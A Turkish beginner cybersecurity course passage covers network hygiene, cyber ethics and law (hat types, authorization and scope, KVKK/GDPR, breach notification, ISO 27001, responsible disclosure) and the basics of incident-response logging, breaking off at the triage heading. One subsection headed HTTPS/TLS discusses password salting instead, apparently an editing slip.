Ağ üzerinde veri taşınırken "dinlenme" ve "değiştirilme" riskleri vardır; şifreleme gizliliğin güçlü koruyucularından biridir. Bir mesajı kilitleyip sadece anahtarı olanın açabilmesi tipik bir örnektir. Web trafiğinde TLS/HTTPS, dosya şifreleme ve mesajlaşma uygulamaları günlük hayatta sık karşılaşılan kullanımlardır.

7.2 HTTPS ve SSL/TLS (Şifreli İletişim)

HTTPS, HTTP’nin TLS ile güvenli hale getirilmiş sürümüdür; tarayıcı ile site arasındaki trafiğin şifrelenmesine yardımcı olur. Salt, önceden hesaplanmış hash listeleri (rainbow table yaklaşımı) gibi yöntemlerin etkisini azaltır. Bu, Modül 3’teki parola güvenliğiyle doğrudan ilişkilidir. Örneğin Aynı şifreyi kullanan iki farklı hesabın hash’lerinin aynı çıkmaması, saldırganın toplu tahmin/karşılaştırma avantajını azaltır. Günlük hayatta Kimlik doğrulama sistemleri, parola depolama standartları.

8) Temel Ağ Hijyeni Kontrol Listesi (Başlangıç Seviyesi)

• Modem/router yönetici parolasını değiştirin; mümkünse çok faktörlü koruma/ek güvenlik seçeneklerini etkinleştirin.

• Modem/router ve cihazlarınızın güncellemelerini ertelemeyin (Modül 4 ile bağlantılı).

• Misafir ağı kullanın; IoT/akıllı cihazları ayrı segmentte tutmayı düşünün (segmentation).

• Gereksiz servis/özellikleri kapalı tutun; port açma gibi işlemleri ihtiyaç ve risk mantığıyla değerlendirin (Modül 1 + Modül 4 hardening).

• Güvensiz ağlarda kritik işlemleri azaltın; gerekiyorsa VPN gibi yöntemleri bilinçli kullanın; ancak VPN’in sınırlarını unutmayın.

• Tarayıcı sertifika uyarılarını ciddiye alın; URL/doğrulama alışkanlıklarını sürdürün (Modül 4 ile bağlantılı).

Terimler Sözlüğü (Glossary)

Bu Modülde Neler Öğrendik

• Ağ güvenliğinin, Modül 1’deki CIA üçlüsünü ağ katmanında hayata geçirdiğini ve Modül 3–4’teki güvenliği tamamladığını öğrendik.

• IP, subnet/CIDR, port ve protokol kavramlarını; TCP ve UDP’nin farklarını güvenlikle ilişkilendirdik.

• DNS’nin alan adlarını IP’ye çevirdiğini ve yanlış yönlendirme riskinin hesap/tarayıcı güvenliğiyle bağlantısını kurduk.

• Modem, router ve switch’in temel rollerini ve ağın “kontrol noktaları” olduğunu kavradık.

• Wi-Fi güvenliği için WPA2/WPA3, misafir ağı ve modem güncelliği gibi pratikleri benimsedik.

• VPN ve proxy’nin kavramsal amaçlarını, faydalarını ve sınırlarını ayırt ettik.

• Firewall, NAT ve ağ ayrıştırmanın saldırı yüzeyi ve risk üzerindeki etkisini yorumladık.

• Kriptografide plaintext/ciphertext/key kavramlarını, simetrik/asimetrik şifrelemeyi ve hash/salt’ın bütünlük ile parola güvenliğindeki rolünü öğrendik.

• Bir sonraki modülde loglama/izleme ve olay yönetimi konularına geçerken, bu ağ kavramlarının “normal/anormal” ayrımı için temel olacağını gördük.

Modül 6 — Siber Güvenlikte Etik, Hukuk ve Uyumluluk

Yetki, kapsam, KVKK/GDPR ve sorumlu bildirim — siber güvenliğin hukuki çerçevesi.

(Etik Hackerlık, Siber Suçlar, KVKK/GDPR, ISO 27001, Sorumlu Bildirim ve Veri İhlali Yönetimi)

Bu modül, siber güvenliğin yalnızca teknik kontrollerden ibaret olmadığını; etik ilkeler, hukuki sınırlar ve uyumluluk gereklilikleriyle birlikte anlam kazandığını ele alır. Önceki modüllerde öğrendiğiniz hesap güvenliği (Modül 3), cihaz/yazılım güvenliği (Modül 4) ve ağ/kriptografi temelleri (Modül 5), burada “meşru yetki + doğru amaç + zarar vermeme + veri koruma” çerçevesine oturtulur. Bir sonraki modülde olay yönetimi ve müdahale süreçlerine ilerlerken (loglama, tespit, sınırlama, bildirim ve ilk adımlar), bu modülde kurduğunuz etik-hukuk-uyum temeli kritik bir pusula olacaktır.

Modül Amaçları

Bu modülü tamamlayan bir öğrenci:

• Etik hackerlık yaklaşımını ve “yetki + kapsam” mantığını, profesyonel sınırlar içinde açıklayabilir.

• “Hacker” kavramının tarihsel/teknik anlamını ve beyaz–siyah–gri şapka ayrımını motivasyon ve yasallık açısından ayırt edebilir.

• KVKK ve GDPR çerçevesinde kişisel veri kavramını, temel rolleri (veri sorumlusu/veri işleyen) ve veri işleme ilkelerini örneklerle yorumlayabilir.

• Veri ihlali kavramını (gizlilik–bütünlük–erişilebilirlik etkileriyle) tanımlar; bildirim ve kayıt tutma disiplininin neden zaman baskısı altında önemli olduğunu analiz edebilir.

• ISO/IEC 27001’in kurumlarda Bilgi Güvenliği Yönetim Sistemi (BGYS/ISMS) kurmadaki rolünü ve “sadece teknik değil süreç + insan + politika” yaklaşımını kavrayabilir.

• Sorumlu açıklama (coordinated vulnerability disclosure) kapsamında, güvenli ve yapıcı bir zafiyet bildirimi taslağı oluşturabilir.

Etik, Hukuk ve Uyumluluk

1) Büyük Resim: Etik ve Hukuk Neden Siber Güvenliğin Parçası?

Beyaz/ gri/ siyah şapka ayrımı, KVKK ve sorumlu zafiyet bildirimi — profesyonel sınırlar.

Önceki modüllerde, sistemi teknik olarak daha güvenli hale getiren yapı taşlarını gördünüz:

• Modül 3’te kimlik/hesap güvenliğiyle “kimin eriştiğini”,

• Modül 4’te cihaz ve yazılım sıkılaştırma ile “cihazın dayanıklılığını”,

• Modül 5’te ağ ve kriptografiyle “verinin yolculuğunu ve korunmasını” ele aldınız.

Ancak gerçek dünyada siber güvenlik çalışmaları şu sorulara cevap vermek zorundadır:

• Yetkim var mı? (Yetkilendirme)

• Neye izinliyim, sınırım ne? (Kapsam)

• İncelediğim/verdiğim raporlar kime zarar verebilir? (Zarar vermeme)

• Gördüğüm veriyi nasıl koruyacağım? (Gizlilik/mahremiyet)

• Bir olay olursa neyi, nasıl kayıt altına alacağım ve kime bildireceğim? (Sorumluluk)

Bu bakış, Modül 1’deki risk anlayışıyla doğrudan bağlantılıdır: “Risk = olasılık × etki.” Etik ve hukuk, yanlış adımların etkisini büyüten (mağduriyet, itibar kaybı, yaptırımlar, iş sürekliliği kaybı) bir risk alanıdır.

Dikkat — “Teknik olarak yapabiliyorum” ≠ “Yapmaya hakkım var”
Bir zafiyeti teknik olarak bulabilmek bir beceridir; fakat izinsiz erişim veya izinsiz veri toplama, iyi niyet iddiasıyla bile ciddi sonuçlar doğurabilir. Profesyonel güvenlik çalışması yetki ve kapsam ile başlar.

2) Etik Hackerlık: Kavram, Şapkalar ve Profesyonel Duruş

2.1 Hacker Kavramının Tanımı ve Evrimi

“Hacker” kelimesi tarihsel olarak, sistemleri derinlemesine anlayan, sınırlarını test eden ve yaratıcı çözümler üreten kişileri ifade ederdi. Zamanla medyada sıklıkla “izinsiz giren suçlu” anlamında kullanıldığı için kavram bulanıklaşmıştır. Etik ve hukuk konuşurken, “hacker” kelimesinin tek bir anlama gelmediğini bilmek, mesleki kimliği doğru kurmayı sağlar. Örneğin Bir kişi bir yazılımı inceleyip güvenlik açığını raporlayabilir; başka biri aynı açığı izinsiz kullanıp zarar verebilir. İkisi aynı teknik bilgiye yaklaşsa da niyet, izin ve yöntem farklıdır. Günlük hayatta İş ilanları (“penetration tester”, “security analyst”), haber dili, bug bounty programları, akademik literatür.

2.2 Şapka Türleri: Beyaz, Siyah ve Gri

Bu sınıflandırmada belirleyici üç ölçüt vardır: izin, motivasyon ve yasallık.

Beyaz Şapkalı (Etik) Hacker

Sistem sahibinden yazılı izin alarak güvenliği artırmak amacıyla test yapan uzmandır. Etik çalışma, Modül 1’deki CIA üçlüsünü korumayı hedefler; zarar üretmez, risk azaltır. Örneğin Bir kurum, “yalnızca example.com üzerinde, mesai saatleri dışında, veri kopyalamadan” test izni verir. Uzman bulguları raporlar, düzeltme önerir. Günlük hayatta Sızma test sözleşmeleri, “Rules of Engagement (ROE)” dokümanları, bug bounty kapsam metinleri.

Siyah Şapkalı Hacker

Kişisel çıkar, maddi kazanç veya zarar verme amacıyla sistemlere izinsiz giren kişidir. Modül 2’de gördüğünüz saldırı motivasyonları ve siber suç ekosistemi, burada “yasallık dışı” eksenine oturur. Örneğin bir kişinin izinsiz biçimde bir e-ticaret sisteminden ödeme verisi almaya çalışması. Günlük hayatta fidye yazılımı olayları, veri sızıntısı pazarları, hesap ele geçirme girişimleri.

Gri Şapkalı Hacker

Bazen iyi niyetli olsa bile izin almadan sisteme müdahale eden kişidir; zarar vermese bile izinsiz işlem nedeniyle hukuki risk taşır. "İyi niyet" tek başına güvenli bir kalkan değildir; yetki ve kapsam olmadan yapılan eylemler, özellikle veriyle temas ettiğinde ağır sonuç doğurabilir. Bir web sitesinde açık bulan kişinin izinsiz biçimde sisteme girip "kanıt" üretmesi ve sonra bildirmesi tipik bir örnektir.

İpucu — Yetki ve kapsamı yazılı hale getirin
Sözlü anlaşmalar yanlış anlaşılabilir. Basit bir e-posta onayı veya imzalı doküman; hedefleri, yöntem sınırlarını, zaman penceresini ve raporlama kanalını netleştirir.

2.3 Ek Bir Kavram: Script Kiddie

Derin teknik anlayışı sınırlı olup, çoğunlukla hazır araçları/komutları deneme-yanılma ile kullanan kişidir. Bu nedenle önemlidir: risk yönetiminde (modül 1) “tehdit aktörü” çeşitliliğini anlamak, savunma önceliklerini etkiler. Günlük bir örnek olarak, i̇nternette bulduğu bir aracı, ne yaptığını tam anlamadan rastgele hedeflere uygulayan kişi. Gerçek hayatta bu durum basit tarama denemeleri, zayıf parola denemeleri, yanlış yapılandırılmış servislerin “kolay hedef” görülmesi.

3) Etik İlkeler: Yetkilendirme, Kapsam, Gizlilik ve Zarar Vermeme

3.1 Yetkilendirme (Authorization) ve Kapsam (Scope)

Yetkilendirme, bir sistem üzerinde güvenlik çalışması yapma iznidir. Kapsam ise bu iznin sınırlarıdır: hangi sistemler, hangi yöntemler, hangi zaman aralığı, hangi veri türleri, hangi raporlama kanalı. Kapsam dışına taşmak istemeden hizmet kesintisi, veri ihlali veya hukuki sorun üretme riskini artırır. "Sadece example.com web uygulaması" izinliyse, aynı altyapıdaki "api.example.com" kapsam dışı olabilir. Sızma test sözleşmeleri, ROE dokümanları ve bug bounty kapsam sayfaları günlük hayatta sık karşılaşılan örneklerdir.

Dikkat — Kapsam dışı 1 adım, tüm çalışmayı riskli hale getirebilir
Bir sistemde teknik olarak “görülebilen” her şey izinli değildir. Kapsam dışı bir loga bakmak bile kişisel veri temasına yol açabilir.

3.2 Zarar Vermeme (Non-maleficence) ve Minimum Müdahale

Güvenlik çalışmasının amacı “göstermek” değil “korumaktır”. Minimum müdahale, sistemi gereksiz yere zorlamamayı ve hizmet sürekliliğini bozmamayı hedefler. Modül 5’te konuştuğunuz ağ/servis yapıları aşırı yükte kesintiye girebilir; bu da CIA’nın erişilebilirlik boyutunu ihlal edebilir. Örneğin Üretim sistemine yoğun istek atmak yerine test ortamı kullanmak veya bakım penceresi belirlemek. Günlük hayatta Üretim–test ayrımı, bakım pencereleri, kontrollü test planları.

3.3 Gizlilik (Confidentiality) ve “Bildiğini Paylaşmama” Disiplini

Güvenlik çalışmasında görülen bilgiler “iş için gerekli minimum kişi” ile paylaşılmalıdır. Bu nedenle önemlidir: modül 3’teki kimlik verileri ve modül 4’teki cihaz bilgileri sızarsa, zarar teknik bulgudan daha büyük olabilir. Günlük bir örnek olarak, ekran görüntüsü paylaşmanız gerekiyorsa, kullanıcı adı/e-posta/kimlik benzeri alanları maskeleyerek paylaşmak. Gerçek hayatta bu durum olay raporları, redaksiyon uygulamaları, erişim logları, gizlilik sözleşmeleri (nda).

3.4 Sorumlu Açıklama (Coordinated Vulnerability Disclosure)

Zafiyet bulunduğunda, ilgili tarafla koordineli iletişim kurup düzeltme için makul süre tanıyarak açıklama yapmak. Bu nedenle önemlidir: amaç, düzeltme yapılmadan önce riski büyütmemek; saldırganlara “hazır hedef” sunmamaktır. Günlük bir örnek olarak, bir web uygulamasında kritik hata bulduğunuzda, sosyal medyada paylaşmak yerine ilgili güvenlik kanalına teknik ama zarar vermeyecek ayrıntıda rapor iletmek. Gerçek hayatta bu durum ürün güvenliği e-postaları, bug bounty süreçleri, kurumsal güvenlik bildirim kanalları.

Basit Zafiyet Bildirimi Taslağı (E-posta formatı)

• Konu: “example.com — Güvenlik bildirimi (kapsam dahilinde)”

• İçerik:

  • Özet: Etki (CIA ile) ve risk seviyesi

  • Etkilenen bileşen: URL/ekran (gerekirse maskeleme)

  • Yeniden üretme adımları (zarar vermeyecek şekilde)

  • Beklenen davranış vs. mevcut davranış

  • Önerilen düzeltme yönü (tavsiye niteliğinde)

  • İletişim bilgisi ve koordinasyon isteği

4) Siber Hukuk: Siber Suçlar ve Delil Mantığı

4.1 Siber Suç Kavramı (Yetkisiz Erişim ve Sistemle İlgili Eylemler)

Siber suçlar; bir bilişim sistemine hukuka aykırı şekilde girmek, sistemde kalmak, verileri bozmak/değiştirmek/yok etmek veya erişimi engellemek gibi eylemleri kapsar. Bu nedenle önemlidir: etik ve hukuk, “teknik deneme” ile “suç” arasındaki sınırı belirler. türkiye’de “bilişim sistemine girme” suçu türk ceza kanunu’nda düzenlenir; izinsiz erişimin suç tipi olarak ele alındığı akademik/hukuki kaynaklarda bu çerçeve ayrıntılandırılır. Günlük bir örnek olarak, başkasının e-posta hesabına izinsiz giriş yapmak, “yetkisiz erişim” çerçevesinde değerlendirilir. Gerçek hayatta bu durum hesap ele geçirme, kurumsal sistemlere izinsiz erişim, yetkisiz veri görüntüleme.

Dikkat — “İyi niyetliydim” savunması sınırları otomatik kaldırmaz
Yetkisiz erişim, zarar verilmemiş olsa bile hukuki risk doğurabilir. Profesyonel refleks: izin + kapsam + kayıt + sorumlu bildirim.

4.2 Dijital Adli Bilişim (Digital Forensics) Neden Önemli?

Dijital adli bilişim; olay sonrası delil toplama, koruma ve analiz disiplinidir. Bir olay yaşandığında, “ne oldu?” sorusunu yanıtlamak kadar, bunun kanıt değerini bozmadan yönetmek de kritiktir. Bu nokta, bir sonraki modülde ele alacağınız olay yönetimi süreçlerine doğrudan bağlanır. Örneğin Panikle logları silmek yerine, önce erişimi sınırlayıp zaman çizelgesi oluşturmak ve kayıtları korumak. Günlük hayatta kurumsal olay müdahale ekipleri, hukuki süreçler, iç denetimler.

5) KVKK ve GDPR: Kişisel Veri, Roller ve İlkeler

5.1 Kişisel Veri ve Özel Nitelikli Veri

Kişisel veri, kimliği belirli veya belirlenebilir bir kişiyle ilişkilendirilebilen bilgidir. Özel nitelikli veri ise ifşa olduğunda daha ağır sonuç doğurabilecek hassas veri kategorileridir. Modül 1'deki "gizlilik" ilkesi, kişisel veriler söz konusu olduğunda doğrudan hukuki yükümlülüğe dönüşür. Bir üyelik sistemindeki ad-soyad, e-posta, oturum kayıtları kişisel veri olabilir. Üyelik formları, okul bilgi sistemleri, e-ticaret ve çağrı merkezi kayıtları günlük hayatta sık karşılaşılan örneklerdir.

Modül 5’teki şifreleme/TLS gibi mekanizmalar gizlilik için önemlidir; ancak tek başına “uyum” sağlamaz. Uyum, verinin nasıl toplandığı, kimlerin eriştiği ve ne kadar saklandığıyla da ilgilidir.

5.2 Roller: Veri Sorumlusu ve Veri İşleyen

Veri sorumlusu (data controller), işleme amaç ve vasıtalarını belirleyen taraftır. Veri işleyen (data processor) ise veri sorumlusunun talimatlarıyla onun adına veri işleyen taraftır. Sorumlulukların kimde olduğu, aydınlatma metinleri, sözleşmeler ve güvenlik tedbirleri bu ayrımla netleşir. Bir etkinlik kayıt formunu yöneten organizasyon veri sorumlusu; form verisini barındıran hizmet sağlayıcı veri işleyen olabilir (sözleşmeye ve talimatlara bağlı olarak). Bulut servisleri, çağrı merkezi hizmeti ve dış kaynak yazılım barındırma günlük hayatta sık karşılaşılan örneklerdir.

İpucu — Rol net değilse süreç de net değildir
Rolünüzü belirlemeden veri toplamaya başlamak; aydınlatma, saklama süresi ve erişim kontrolünde hatalara yol açar.

5.3 KVKK Genel İlkeleri: “Doğru Veri, Doğru Amaç, Doğru Süre”

KVKK’da veri işlemede hukuka uygunluk, doğruluk/güncellik, belirli-açık-meşru amaç, amaçla bağlantılı-sınırlı-ölçülü olma ve gerekli süre kadar muhafaza gibi ilkeler öne çıkar. Bu nedenle önemlidir: “Ne kadar çok veri, o kadar iyi” yaklaşımı yanlıştır; gereksiz veri gereksiz risk demektir. Günlük bir örnek olarak, bülten aboneliğinde sadece e-posta yeterliyken adres/kimlik istemek ölçülülük ilkesine aykırı risk doğurur. Gerçek hayatta bu durum üyelik formları, kampanya kayıtları, mobil uygulama izinleri.

5.4 GDPR Prensipleri ve Hesap Verebilirlik

GDPR, veri işleme ilkelerini sistematik hale getirir: hukuka uygunluk, amaca bağlılık, veri minimizasyonu, doğruluk, saklama süresi sınırlaması, bütünlük-gizlilik ve hesap verebilirlik gibi başlıklar. Bu nedenle önemlidir: ab ile ilişkili hizmetlerde, prensipler pratik bir “kontrol listesi” gibi çalışır. Günlük bir örnek olarak, “Hesap sil” talebi verildiğinde verinin gerçekten silinmemesi; saklama süresi ve veri sahibinin hakları açısından uyumsuzluk üretir. Gerçek hayatta bu durum çerez tercih ekranları, kullanıcı hakları başvuruları, veri saklama politikaları.

6) Veri İhlali (Data Breach): Tanım, Zaman Baskısı ve İlk Adımlar

72 saat bildirim süresi — veri ihlalinde hızlı tepki kritiktir.

6.1 Veri İhlali Nedir?

Kişisel verilerin yetkisiz erişim/ifşa/kayıp/değişiklik veya erişilemez hale gelmesi gibi veri güvenliğini bozan olaylar. CIA üçlüsünün üç boyutu da etkilenebilir:

• Gizlilik: veri sızıntısı

• Bütünlük: veri değiştirme

• Erişilebilirlik: veri kaybı/şifrelenme/servis kesintisi
  Basit örnek: Bir dosya paylaşım bağlantısının yanlışlıkla “herkese açık” kalması.
  Gerçek hayatta nerede görülür? Yanlış bulut izinleri, yanlış e-posta gönderimi, kaybolan cihaz, zayıf erişim kontrolü.

6.2 “72 Saat” Mantığı: Neden Zaman Kritik?

Veri ihlallerinde “gecikmeden hareket etme” esastır; amaç zararı sınırlamak ve doğru koordinasyon kurmaktır.

• GDPR, denetim otoritesine bildirimin “gereksiz gecikme olmaksızın” ve mümkünse 72 saat içinde yapılmasını vurgular.

• KVKK tarafında da Kurul kararlarında veri ihlalinin Kuruma en kısa sürede ve en geç 72 saat içinde bildirilmesi yaklaşımı yer alır.

Dikkat — Bildirim panik değil süreç işidir
Hız önemlidir; ama eksik/yanlış bilgi de risktir. Bu yüzden “ne oldu, ne zaman fark edildi, ilk hangi adımlar atıldı?” kayıtları kritik hale gelir.

6.3 Başlangıç Seviyesi “İlk 6 Adım” Kontrol Listesi

1. Sınırlama: Yanlış paylaşımı kapat, erişimleri durdur, gerekirse anahtarları/parolaları değiştir.

2. Koruma: Kanıtı bozma (logları silme, cihazı rastgele kurcalama).

3. Kayıt: Zaman çizelgesi oluştur (ilk fark eden, saat, belirtiler).

4. Kapsam: Hangi veriler/hangi kullanıcılar etkilenmiş olabilir?

5. İletişim: Yetkili kişileri bilgilendir (sorumlu ekip/kişi).

6. Düzeltme: Kök nedeni gidermeye başla (yanlış izin, zayıf erişim kontrolü, gereksiz açık servis vb.).

Bir sonraki modülde bu adımları loglarla nasıl destekleyeceğinizi, olay sınıflandırmayı ve temel müdahale akışını daha sistematik biçimde ele alacaksınız.

7) Uyum (Compliance) ve Kurumsal Yaklaşım: Veri Yaşam Döngüsü ve ISO/IEC 27001

7.1 Veri Yaşam Döngüsü (Data Lifecycle) Düşüncesi

Veri; toplanır, işlenir, saklanır, paylaşılır, arşivlenir ve silinir. Bu nedenle önemlidir: güvenlik sadece “toplama anında” değil, yaşam döngüsünün her adımında gereklidir. Günlük bir örnek olarak, hesap silinse bile yedeklerde veri kalabilir; bu durum saklama politikası ve erişim kontrolü gerektirir. Gerçek hayatta bu durum yedekleme sistemleri, log saklama, arşiv süreçleri.

7.2 Minimum Veri (Data Minimization) ve Erişim Kontrolü

“Gerekli olanı topla, gerekli olan kadar tut, gerekli olan kişi görsün.” Bu nedenle önemlidir: modül 3’teki “en az ayrıcalık” ilkesi veri erişimi için de geçerlidir. Günlük bir örnek olarak, destek ekibinin sadece gerekli alanları görmesi; hassas alanların maskelenmesi. Gerçek hayatta bu durum rol tabanlı erişim (rbac), ekran maskeleme, ayrı yetki seviyeleri.

7.3 Şeffaflık: Aydınlatma ve İletişim

Kişiye “hangi verim, hangi amaçla, ne kadar süreyle, kimlerle paylaşılabilir?” bilgilerinin açıkça sunulması yaklaşımıdır. Bu nedenle önemlidir: güven ilişkisi ve hesap verebilirlik, teknik önlemler kadar iletişimle de güçlenir. Günlük bir örnek olarak, kayıt formunda kısa bir aydınlatma bağlantısı ve iletişim kanalı bulundurmak. Gerçek hayatta bu durum web formları, mobil izin ekranları, çerez tercih panelleri.

7.4 ISO/IEC 27001: BGYS/ISMS ve Neden Kurumlar İçin Önemli?

ISO/IEC 27001, kurumlarda Bilgi Güvenliği Yönetim Sistemi (BGYS/ISMS) kurmak için kullanılan uluslararası bir standarttır. Güvenliği sadece “teknik araçlar” olarak değil; risk yönetimi, politika, süreç, rol ve sorumluluklar, insan faktörü ile birlikte yönetmeye zorlar. ISO, bu standardın bilgi güvenliği yönetimi için en bilinen çerçevelerden biri olduğunu belirtir. Örneğin Kurumun erişim yetkileri, olay yönetimi prosedürü, varlık envanteri ve eğitim planı gibi konuların “tek bir sistem” altında yönetilmesi. Günlük hayatta kurumsal denetimler, tedarikçi değerlendirmeleri, güvenlik politika setleri, sertifikasyon süreçleri.

Terimler Sözlüğü (Glossary)

Bu Modülde Neler Öğrendik?

• Siber güvenliğin etik ve hukuk boyutunun, teknik önlemler kadar kritik olduğunu öğrendik.

• “Hacker” kavramının tek bir anlama gelmediğini; beyaz–siyah–gri şapka ayrımının izin, motivasyon ve yasallıkla belirlendiğini kavradık.

• Yetkilendirme ve kapsamın, güvenlik çalışmalarında hem profesyonel kaliteyi hem de hukuki güvenliği belirlediğini gördük.

• Zarar vermeme ve minimum müdahale yaklaşımıyla, teknik testlerin hizmet sürekliliğiyle dengelenmesi gerektiğini anladık.

• KVKK/GDPR bağlamında kişisel veri, veri sorumlusu/veri işleyen rolleri ve veri minimizasyonu gibi ilkelerin pratik karşılıklarını ilişkilendirdik.

• Veri ihlali kavramını CIA üçlüsüyle bağladık; zaman baskısı altında kayıt tutma ve doğru ilk adımların neden hayati olduğunu öğrendik.

• ISO/IEC 27001’in kurumlarda BGYS/ISMS yaklaşımıyla güvenliği yönetilebilir bir sisteme dönüştürdüğünü gördük.

• Sorumlu zafiyet bildirimi yaklaşımıyla, bulguları güvenli ve yapıcı biçimde paylaşmanın temel prensiplerini öğrendik.

Modül 7 — Olay Yönetimi ve Müdahale Temelleri + Siber Güvenlik Kariyer Farkındalığı

(Loglama, Tespit, Sınırlama, İlk Müdahale Akışı, Kanıt Disiplini ve Rollere Bağlantı)

Bu modül, bir güvenlik olayı şüphesi ortaya çıktığında “neye bakarım, nasıl sınıflandırırım, hangi adımları hangi sırayla uygularım?” sorularını başlangıç düzeyinde yanıtlatmayı hedefler. Önceki modüllerde edindiğiniz hesap güvenliği (Modül 3), uç nokta/yazılım güvenliği (Modül 4), ağ ve kriptografi temelleri (Modül 5) ile etik–hukuk–uyumluluk çerçevesi (Modül 6), burada olay yönetimi pratiğine dönüşür: log okuryazarlığı, triage (ön değerlendirme), ilk müdahale yaşam döngüsü, kanıtı bozmadan hareket etme ve kontrollü iletişim. Ayrıca modülün ikinci kısmında, bu pratik akışın iş dünyasında hangi rollere (SOC analisti, olay müdahale uzmanı, sızma testi uzmanı, GRC vb.) karşılık geldiğini, yeni başlayan biri için kariyer yol haritası, temel yetkinlikler ve yaygın sertifikasyonların genel konumlandırmasını ele alacaksınız. Bir sonraki modülde, bu refleksi daha sistematik izleme ve analiz yaklaşımlarına (ör. korelasyon, SOC mantığı, tespit kuralı düşüncesi) taşımanın neden kritik olduğunu daha net göreceksiniz.

Modül Amaçları

Bu modülü tamamlayan bir öğrenci:

• Event–alert–incident–breach ayrımını kurar ve doğru sınıflandırmanın neden doğru tepkiyi belirlediğini açıklar.

• Temel log türlerini (kimlik doğrulama, sistem, uygulama, ağ) örneklerle yorumlar; zaman damgası ve senkronizasyon sorunlarının analiz hatasına nasıl yol açtığını kavrar.

• Bir olay şüphesinde triage yapar; etkiyi CIA (Gizlilik–Bütünlük–Erişilebilirlik) ile ilişkilendirerek önceliklendirme yapar.

• Olay müdahale yaşam döngüsünü (hazırlık, tespit, sınırlama, giderme, kurtarma, ders çıkarma) başlangıç seviyesinde uygular.

• Kanıt koruma, kayıt tutma ve iletişim/bildirim disiplininin (Modül 6 ile bağlantılı) olay yönetimindeki rolünü açıklar.

• Olay yönetimi pratiklerinin siber güvenlikteki mavi takım, kırmızı takım, mor takım ve GRC gibi rol/alanlarla ilişkisini kurar; başlangıç düzeyi bir öğrenme planı taslaklandırır.

Olay Yönetimi ve Müdahale Temelleri

1) Büyük Resim: Olay Yönetimi Neden Gerekli?

Önceki modüllerde güvenliği çoğunlukla önleyici kontrollerle güçlendirdiniz: güçlü kimlik doğrulama (Modül 3), güncelleme ve sıkılaştırma (Modül 4), ağ kontrolleri ve şifreleme (Modül 5). Ancak gerçek dünyada sıfır risk yoktur; asıl farkı yaratan, bir anormallik görüldüğünde hızlı ve doğru hareket edebilmek ve hasarı sınırlayabilmektir.

• Geri referans (Modül 1): Risk = olasılık × etki. Olay yönetimi özellikle “etkiyi” düşürmek için vardır.

• Geri referans (Modül 5): IP/port/protokol bilgisi, “normal trafik mi anomali mi?” sorusunu yanıtlamada temel sağlar.

• Geri referans (Modül 6): Kanıtı bozma, izinsiz paylaşım veya hatalı bildirim; teknik sorundan daha büyük etik/hukuki sonuçlar doğurabilir.

• İleri referans (Bir sonraki modül): Korelasyon ve sürekli izleme mantığına geçtiğinizde, burada kazandığınız log okuryazarlığı “ham veriyi anlamlı sinyale dönüştürme”nin başlangıcı olacaktır.

Dikkat Kutusu — Olay yönetimi “panik anı” değil, süreç disiplinidir
Paniğin en sık yaptığı hata: log silmek, sistemi rastgele kurcalamak, doğrulanmamış bilgiyi kontrolsüz yaymak. Doğru yaklaşım: sınırlama + kayıt + doğrulama + kontrollü iletişim.

2) Temel Kavramlar: Event, Alert, Incident, Breach

2.1 Event (Olay Kaydı)

Sistem/uygulamada gerçekleşen herhangi bir işlemin kaydıdır (oturum açma, dosya erişimi, servis başlatma vb.). Olay yönetiminde ham veri çoğunlukla event olarak gelir; event’lerin çoğu saldırı değildir ama hepsi iz bırakır. Örneğin Bir kullanıcı example.com hesabına giriş yapar; sistem “login success” kaydı üretir.. Günlük hayatta İşletim sistemi günlükleri, uygulama logları, EDR/antivirüs kayıtları.

2.2 Alert (Alarm/Uyarı)

Alert, bir kural veya algoritmanın event'leri şüpheli bulduğunda üretilen uyarıdır. "Bakmaya değer bir şey olabilir" der; ancak her alert gerçek saldırı değildir (false positive olabilir). Aynı hesaba kısa sürede çok sayıda hatalı parola denemesi yapılınca "brute force şüphesi" alarmı oluşması tipik bir örnektir. Firewall/IDS uyarıları, EDR alarmları ve SIEM uyarıları günlük hayatta sık karşılaşılan durumlardır.

2.3 Incident (Güvenlik Olayı) ve Breach (İhlal)

Incident, güvenlik politikasını ihlal eden veya hizmeti etkileyen doğrulanmış olaydır. Breach ise özellikle kişisel veri ve gizlilik boyutunda yetkisiz erişim, ifşa veya kayıp gibi veri ihlalidir. Modül 6'da gördüğünüz bildirim ve kayıt disiplini incident ve breach olduğunda kritikleşir. Yetkisiz yönetici oturumu tespit edilirse incident sayılabilir; kişisel veriler dışarı sızmışsa breach boyutu doğar. Veri sızıntısı olayları, fidye yazılımı vakaları ve hesap ele geçirme günlük hayatta sık karşılaşılan örneklerdir.

İpucu Kutusu — Kelimeyi doğru seçmek doğru tepkiyi getirir
“Event” çoktur, “alert” seçicidir, “incident” doğrulanmıştır. Yanlış sınıflandırma ya gereksiz paniğe ya da tehlikeli gecikmeye yol açar.

3) Log Okuryazarlığı: Hangi Log Ne Söyler?

3.1 Log (Günlük)

Sistem ve uygulamaların yaptığı işlemleri zaman damgası ile kayıt altına alan metin/JSON benzeri kayıtlardır. Olay anında en kritik soru “ne oldu?”dur. Loglar bunu kanıta dayalı yanıtlamayı sağlar. Örneğin “2026-01-13 10:15:02 — kullanıcı giriş yaptı” kaydı.. Günlük hayatta Sunucular, uygulamalar, modem/firewall cihazları, bulut servisleri.

3.2 Zaman Damgası ve Senkronizasyon (Time Sync)

Logların “ne zaman” üretildiğini gösteren zaman bilgisidir; sistem saatleri tutarsızsa analiz zorlaşır. Olay akışı dakikalar/saniyelerle çözülür. Saatler farklıysa yanlış sonuca varabilirsiniz. Örneğin Bir cihazın saati 15 dakika gerideyse saldırı zincirini yanlış sıralayabilirsiniz.. Günlük hayatta Olay sonrası inceleme, SIEM korelasyonu, zaman çizelgesi çıkarma.

Dikkat Kutusu — Zaman hatası, en yaygın analiz tuzağıdır
Analize başlamadan önce logların saat dilimi (UTC/yerel), cihaz saati ve olayın gerçek zamanı tutarlı mı kontrol edin.

3.3 Log Türleri (Başlangıç Seviyesi Harita)

• Kimlik doğrulama (Authentication) logları: giriş/çıkış, MFA denemeleri, başarısız girişler

• Sistem logları: servis başlatma, kullanıcı oluşturma, kritik hatalar

• Uygulama logları: API hataları, yetki reddi, beklenmeyen istisnalar

• Ağ logları: bağlantı denemeleri, port erişimleri, DNS istekleri (Modül 5 ile doğrudan bağlantılı)

• Geri referans (Modül 3): Şüpheli giriş denemeleri ve oturum uyarıları hesap güvenliğinin “olay sinyali”dir.

• Geri referans (Modül 5): IP/port/protokol bilgisi ağ loglarını anlamlandırır.

4) Triage: İlk Dakikalarda Ne Yapılır?

